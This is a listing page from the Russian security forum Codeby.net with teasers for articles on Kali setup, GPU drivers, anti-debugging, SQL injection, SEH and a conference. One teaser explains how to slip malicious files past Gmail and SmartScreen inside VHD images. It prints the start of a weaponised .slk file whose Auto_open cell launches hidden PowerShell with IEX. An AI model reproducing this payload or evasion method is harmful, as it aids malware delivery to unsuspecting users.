Форум информационной безопасности - Codeby.net

Статья Entry Point – дело о пропавшем индексе (часть 1)

  • 7 203
  • 2
Термин EntryPoint знаком каждому программисту – это адрес точки входа в программу, т.е. первой инструкции исполняемого кода. Компиляторы прошивают этот адрес в РЕ-заголовок по смещению 28h, а системный "загрузчик образов" потом считывает его от туда, и передаёт на него управление. Такому алгоритму следуют все LDR-загрузчики, начиная с Win98 и до наших дней. Сам загрузчик оформлен в виде функции LdrpInitializeProcess() из библиотеки Ntdll.dll.

В данной статье рассмотрим несколько способов реализации фиктивных точек EntryPoint, что позволит защитить наши программы от взлома и отладки. Например зачем выставлять на показ процедуру проверки введённого пароля, или какой-нибудь авторской техники? До тех пор пока она не станет достоянием общественности, мы сможем использовать её в своих программах снова и снова. Но как-только корабль даст течь, придётся латать дыры, на что нужно время, которого всегда не хватает.

Проблема в том, что если в наших планах написать использующее системные механизмы кроссплатформенное приложение, то мы непременно столкнёмся с трудностями. Связано это с тем...

Статья Как установить Kali Linux на Raspberry Pi

  • 5 338
  • 0
Raspberry Pi — это очень простой дешёвый ARM компьютер. Не смотря на то, что его спецификация звёзд не хватает, это отличный вариант для крошечной Linux системы и он может делать гораздо большее, чем быть медиа компьютером.

По умолчанию, образ Kali Linux Raspberry Pi хорошо отлажен с минимумом инструментов, схожий со всеми другими образами для ARM. Если вы хотите обновить инсталляцию до стандартной настольной инсталляции, вы можете включить дополнительные инструменты, установив метапакет kali-linux-full. Для большей информации по метапакету, пожалуйста обратитесь к нашей странице инструментов.

Размещение Kali на Raspberry Pi — простой способ
Если всё, что вы хотите сделать, это установить Kali на вашем Raspberry Pi, проделайте эти инструкции:
  1. Возьмите хорошую быструю на 8 GB (или более) SD карту. Крайне рекомендуется Class 10.
  2. Загрузите образ Kali Linux Raspberry Pi в разделе загрузок.
  3. Используйте утилиту dd чтобы сделать образ этого файла на карту...

Статья Установка драйверов NVIDIA на Kali

  • 18 819
  • 5
Если у вас Kali Linux установлена в виртуальной машине, то она никогда не увидит вашу видеокарту. Т.е. эта инструкция не применима для ОС в виртуальной машине.

Этот документ объясняет, как задействовать видео железо от NVIDIA и установить драйверы на систему Kali Linux. Первый шаг, это полностью обновите вашу систему Kali Linux и убедитесь, что у вас установлены заголовки ядра (kernel headers).
Bash:
apt-get update
apt-get dist-upgrade
apt-get install -y linux-headers-$(uname -r)
apt-get install nvidia-kernel-dkms


Следующий шаг — это отключение драйвера nouveau. Nouveau — это опен-сорсный проект драйверов NVIDIA, однако ему не хватает 3D ускорения графики, которое необходимо для запуска инструментов Cuda pentest.
Bash:
sed 's/quiet/quiet nouveau.modeset=0/g' -i /etc/default/grub
update-grub
reboot


Как только система снова загрузится, вы можете увидеть экран заставки NVIDIA, который означает, что драйверы установились правильно, тем не менее, это не всегда так. Чтобы проверить, работают ли драйверы должным образом, выполните следующую команду...

Статья Обход проверки вредоносных файлов почтовыми службами и фильтром Microsoft SmartScreen

  • 7 577
  • 13
Введение
Приветствую всех! В этой статье мы рассмотрим метод обхода анализа отравляемых нами файлов почтовой службой Gmail и встроенным в Windows компонентом Microsoft SmartScreen. Недавно выяснилось что файлы внутри виртуальных дисков VHD и VHDX не сканируются антивирусами. И даже при запуске подозрительных файлов внутри таких образов, служба SmartScreen не выдает абсолютно никаких предупреждений пользователю. А почтовые сервисы вовсе не умеют их читать и позволяют беспрепятственно передавать внутри них вирусы.

Основная часть
Для начала создадим MS Excel подобный файл (.slk) с полезной нагрузкой и попытаемся отправить его нашей жертве через Gmail.
В текстовом редакторе пишем следующий код и сохраняем с расширением .slk

Bash:
ID;P
O;E
NN;NAuto_open;ER101C1;KOut Flank;F
C;X1;Y101;EEXEC("pOwERsHELL -eX b -W 1 -nOP -nONi IEX((nEW-obJECT...

Статья Установка Дополнений гостевой ОС VirtualBox для Kali Linux 2.0

  • 22 495
  • 6
Если вы запускаете Kali Linux в качестве «гостевой» системы в VirtualBox, эта статья поможет вам успешно установить инструменты «Дополнения гостевой ОС».

Вы должны использовать VirtualBox версии 4.2.xx или выше, чтобы воспользоваться улучшениями, включающие обновления совместимости и улучшенную стабильность как основного приложения, так и Дополнений гостевой ОС.

Установка Дополнений гостевой ОС VirtualBox для Kali Linux
Дополнений гостевой ОС VirtualBox обеспечивают надлежащую интеграцию мыши и экрана, а также общий доступ к каталогу с вашей основной операционной системой. Чтобы установить их, следуйте инструкции.

Запустите вашу виртуальную машину с Kali Linux, откройте окно терминала и наберите следующую команду для установки заголовков ядра Linux.
Bash:
apt-get update && apt-get install -y linux-headers-$(uname -r)
Когда это завершено, вы можете подключить CD-ROM образ с «Дополнениями гостевой ОС». Выберите «Устройства» → «Подключить образ диска Дополнений гостевой ОС». Это смонтирует ISO с Гостевыми дополнениями в виртуальный CD привод вашей виртуальной машины Kali Linux. Когда появиться предложение...

BlackArch Linux полное руководство

  • 17 337
  • 5
Источник BlackArch Linux - Penetration Testing Distribution

Содержание
  • 1 Введение
    • 1.1 Обзор
    • 1.2 Что такое BlackArch Linux?
    • 1.3 История BlackArch Linux
    • 1.4 Поддерживаемые платформы
    • 1.5 Внести свой вклад
  • 2 Руководство пользователя
    • 2.1 Установка
      • 2.1.1 Установка поверх ArchLinux
      • 2.1.2 Установка пакетов
      • 2.1.3 Установка пакетов из источника
      • 2.1.4 Основы использования Blackman
      • 2.1.5 Установка из live-, netinstall- ISO или ArchLinux
  • 3 Руководство разработчика
    • Руководство разработчика BlackArch Linux
  • 4 Руководство по инструментам
    • 4.1 Скоро …
Глава 1

Введение
1.1 Обзор
Руководство по BlackArch Linux разделено на несколько частей:
  • Введение – Общий обзор дистрибутива, введение и дополнительная полезная...

Статья Слепая SQL инъекция

  • 7 856
  • 1
Оригинал: Blind SQL Injection
Продолжайте только если уже познакомились с основами SQL инъекций. Если нет, сначала прочитайте эти посты:
  1. SQL-инъекции: простое объяснение для начинающих
  2. Ручные SQL инъекции (с помощью одного только браузера)
  3. Автоматические SQL инъекции с помощью SQLMap (Kali Linux)
  4. Как запустить sqlmap на Windows

Что нам уже известно
Если вы просмотрели три приведённых выше руководства, значит, понимаете, что из себя представляют SQL инъекции, умеете выполнять их через свой браузер на уязвимых сайтах, а также знаете, как использовать SQLMap для автоматизации некоторых процессов.
Теперь вспомним, что мы делали в...

Статья SEH – фильтр необработанных исключений

  • 6 628
  • 0
Во времена рассвета DOS программист имел полную власть над системой. Находясь в реальном режиме работы CPU, у нас не было никаких ограничений и мы могли использовать в программах буквально все инструкции и регистры процессора, общее число которых на Р6 стремилось преодолеть барьер в ~200 единиц. Это была отличная школа программирования, где вся ответственность за то или иное действие возлагалась полностью на наши плечи. Всё приходилось делать вручную, в том числе и обрабатывать аппаратные исключения с ошибками. Одним словом, царила атмосфера свободы и демократии, столь редкая в наши дни.

А что мы имеем сейчас в защищённом режиме? Microsoft отобрала у нас все права и вместо них вручила более 5000 системных API, но забыла толком объяснить, для чего они и как ими пользоваться. При малейщем чихе гигантская система валится в BSOD подымая в небеса тонны пыли, не забыв прихватить с собой наши не сохранённые данные. Ладно если был-бы реальный повод, так ведь может и без веских на то причин.

В данной статье предлагаю рассмотреть способы перехвата системных исключений в защищённом режиме. Мы постараемся отобрать у системы то, что принадлежит нам по праву – это управление при...

ZeroNights 2019 - международная хакерская конференция в Санкт-Петербурге пройдет 12-13 ноября

  • 8 504
  • 7
12-13 ноября 2019 г. в Санкт-Петербурге в девятый раз пройдет ежегодная международная конференция по информационной безопасности ZeroNights. Каждый год ZeroNights собирает более 2000 экспертов, специалистов-практиков по ИБ, администраторов, пентестеров, аналитиков и хакеров со всего мира.


Программный комитет конференции пополнили специалисты по информационной безопасности: Антон ‘Bo0oM‘ Лопаницын, Сергей Белов (DCG7812 community), Евгений Родионов (Google), Федор Ярочкин (Trend Micro) и Тарас Иващенко (OZON).

Каждый исследователь, который представит свое эксклюзивное 45-ти минутное исследование, может рассчитывать на денежное вознаграждение в 1000$. Прием заявок на выступления продлится до 10 октября.

Программа конференции

В рамках конференции будут представлены доклады ведущих российских и зарубежных экспертов в области ИБ. Посетители узнают об актуальных проблемах, новых атаках и реальных угрозах, а также познакомятся с нестандартными методами решения задач информационной безопасности.

Доклады основной программы гости услышат с главной сцены клуба А2...
🚀 Первый раз на Codeby?
Гайд для новичков: что делать в первые 15 минут, ключевые разделы, правила
Начать здесь →
💼 Вакансии и заказы в ИБ
Pentest, SOC, DevSecOps, bug bounty — работа и проекты от проверенных компаний
Карьера в ИБ →

Статистика форума

Темы
50 972
Сообщения
344 724
Пользователи
148 487
Новый пользователь
X_O_Ox